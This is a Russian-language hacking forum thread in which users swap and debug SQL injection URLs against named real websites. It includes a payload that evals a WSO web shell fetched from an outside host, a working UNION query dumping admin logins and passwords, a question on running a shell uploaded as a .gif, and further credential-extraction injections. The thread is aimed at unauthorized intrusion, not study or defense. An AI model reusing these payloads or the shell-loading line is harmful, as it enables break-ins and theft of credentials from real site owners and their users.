Code: Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630 Почему выскакивает такая штука, и как это обойти? Спасибо. Вот запрос: Code: http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
А не проще ли было загуглить ф-цию \ ошибку? Функция не может распарсить URL, потому что URL для нее невалиден.
о0, хакер, ты не мог бы объяснить мне этот запрос? union select '<?php eval..... ?>' Во-первых, там нет прав, если ты планировал залить результаты выборки(читай твой зло-код эвала) селекта в файл. К томуже, твоя конструкция(без outfile, etc) ни к чему бы и не привела=/ Во-вторых, где ты там скулю увидел? В-третьих, вот скуля с выводом, логин и пасс одмино. Code: http://www.sko-lotos.com/catalog.php?id=381'and(0)union select 1,concat_ws(0x3b, name, password),3,4,5,6,7 from users-- -
имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?
Здесь через ошибку помогите вывести: http://dahliasuppliers.com/noahsclassifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=11'+order+by+26+--+&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&clearoff=1
На сайте блинд скуль, но почему-то я не могу даже узнать версию бд, подскажите пожалуйста, что сделать чтоб узнать? Code: http://www.trudprava.ru/ibp.php?id=1%20and%20substring%28@@version,1,1%29= 5
Как можно раскрутить это? А то не пойму, что не так с синтаксисом. Коммент ток на одну строку что ли попадает? http://www.fc-anji.ru/search/?search=123')))+AS+foo--+
Часто встречаю в теме sql-инъекций сообщения вида: Не тыкнете носом какие статьи прочитать, чтобы знать как это можно использовать?(Про залив шелла через скулю с файл-привом = Y знаю.) Спасибо.
И почему в 4 версии не поддерживается table_schema?! Как можно ещё? table_schema http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6+from+information_schema.tables+where+table_schema=0x636F6E636F7264345F6C6169746B6970657273--
http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex(hex(concat(user_name,0x3a,user_pass))),3,4,5,6+from+user--+
Code: http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x3a,count(*)),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+forum_users+--+ пустая таблица
во первых синтаксетическая ошибка: group_concat(concat_ws(0x3a3a3a,user_name,pass)+separator+0x0b) а должно быть: group_concat(concat_ws(0x3a,user_name,pass)+separator+0x0b) во вторых, там таблица пустая!!! а вообще для примера по твоей уязвимости вот пример вывода: